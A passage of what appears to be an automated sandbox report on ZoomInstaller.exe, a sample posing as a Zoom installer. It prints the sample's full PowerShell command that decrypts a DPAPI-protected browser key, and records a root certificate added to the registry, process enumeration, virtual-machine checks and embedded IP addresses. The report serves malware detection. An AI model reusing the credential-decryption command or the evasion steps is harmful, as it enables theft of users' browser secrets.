[System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: ZoomInstaller.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ZoomInstaller.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: ZoomInstaller.exe Static file information: File size 22207488 > 1048576
Source: ZoomInstaller.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3e6000
Source: ZoomInstaller.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x30f000
Source: ZoomInstaller.exe Static PE information: Raw size of /19 is bigger than: 0x100000 < 0x4e8c00
Source: ZoomInstaller.exe Static PE information: Raw size of /45 is bigger than: 0x100000 < 0x203200
Source: ZoomInstaller.exe Static PE information: Raw size of /81 is bigger than: 0x100000 < 0x38fe00
Source: ZoomInstaller.exe Static PE information: Raw size of /92 is bigger than: 0x100000 < 0x112200
Source: ZoomInstaller.exe Static PE information: Raw size of /141 is bigger than: 0x100000 < 0x17ec00
Source: ZoomInstaller.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: ZoomInstaller.exe Static PE information: section name: .xdata
Source: ZoomInstaller.exe Static PE information: section name: /4
Source: ZoomInstaller.exe Static PE information: section name: /19
Source: ZoomInstaller.exe Static PE information: section name: /31
Source: ZoomInstaller.exe Static PE information: section name: /45
Source: ZoomInstaller.exe Static PE information: section name: /57
Source: ZoomInstaller.exe Static PE information: section name: /70
Source: ZoomInstaller.exe Static PE information: section name: /81
Source: ZoomInstaller.exe Static PE information: section name: /92
Source: ZoomInstaller.exe Static PE information: section name: /106
Source: ZoomInstaller.exe Static PE information: section name: /125
Source: ZoomInstaller.exe Static PE information: section name: /141
Source: ZoomInstaller.exe Static PE information: section name: /157
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9BAD1D9F push esp; iretd 17_2_00007FFD9BAD2043

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\ZoomInstaller.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: ZoomInstaller.exe Binary or memory string: SCHED={PC:, GP->STATUS= PLUGINPATH= : UNKNOWN PC CALLED FROM RUNTIME: PID=LEVEL 3 RESETSRMOUNT ERRORTIMER EXPIREDEXCHANGE FULLREGENUMKEYEXWREGOPENKEYEXWCERTOPENSTOREFINDNEXTFILEWMAPVIEWOFFILEVIRTUALUNLOCKWRITECONSOLEWFREEADDRINFOWGETHOSTBYNAMEGETSERVBYNAMEPARSING TIME OUT OF RANGE IS TOO LARGENOT AVAILABLEDALTLDPSUGCT?3814697265625GETTEMPPATH2WMODULE32NEXTWRTLGETVERSIONREGENUMVALUEWIMAGELIST_ADDCREATERECTRGNGETDEVICECAPSSETBRUSHORGEXCREATEACTCTXWFINDRESOURCEWRTLMOVEMEMORYCOTASKMEMFREEOLEINITIALIZESYSFREESTRINGWGLSHARELISTSPDHCLOSEQUERYSHELLEXECUTEWANIMATEWINDOWDESTROYWINDOWDRAWFOCUSRECTGETCLASSNAMEWGETCLIENTRECTGETMENUITEMIDGETSCROLLINFOGETSYSTEMMENUGETWINDOWRECTOPENCLIPBOARDSETSCROLLINFOGETTHEMECOLOROPENTHEMEDATAENUMPRINTERSWNAME TOO LONGTLSMAXRSASIZEACCESS DENIEDUSER CANCELEDPKCS1WITHSHA1ECDSAWITHSHA1CLIENT_RANDOMGZIP, DEFLATEGOCACHEVERIFYINSTALLGOROOTHTML/TEMPLATEREGDELETEKEYWDELETESERVICESTARTSERVICEWGETDRIVETYPEWTHREAD32FIRSTWAITCOMMEVENTRTLINITSTRINGENUMPROCESSESEXITWINDOWSEXTIMEENDPERIODWTSFREEMEMORYINVALID ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSEMAIL ADDRESSSHARED_SECRETEMPTY INTEGERUNSUPPORTED: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228TVAUENRRRAOKWAVMWARE SVGA 3DVMWAREUSER.EXEXENSERVICE.EXEVMWARETRAY.EXECHROME DEFAULTYANDEX DEFAULTCOCCOC DEFAULTIS A DIRECTORY_SECURE_DELETEUNEXPECTED EOFINTERNAL ERRORGETPROTOBYNAMEUNKNOWN MODE: CONTENT-LENGTHMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%DACCEPT-CHARSETCONTENT-LENGTHREAD_FRAME_EOFUNKNOWN ERROR UNKNOWN CODE: NOT ACCEPTABLECOMPUTERNAMEEX
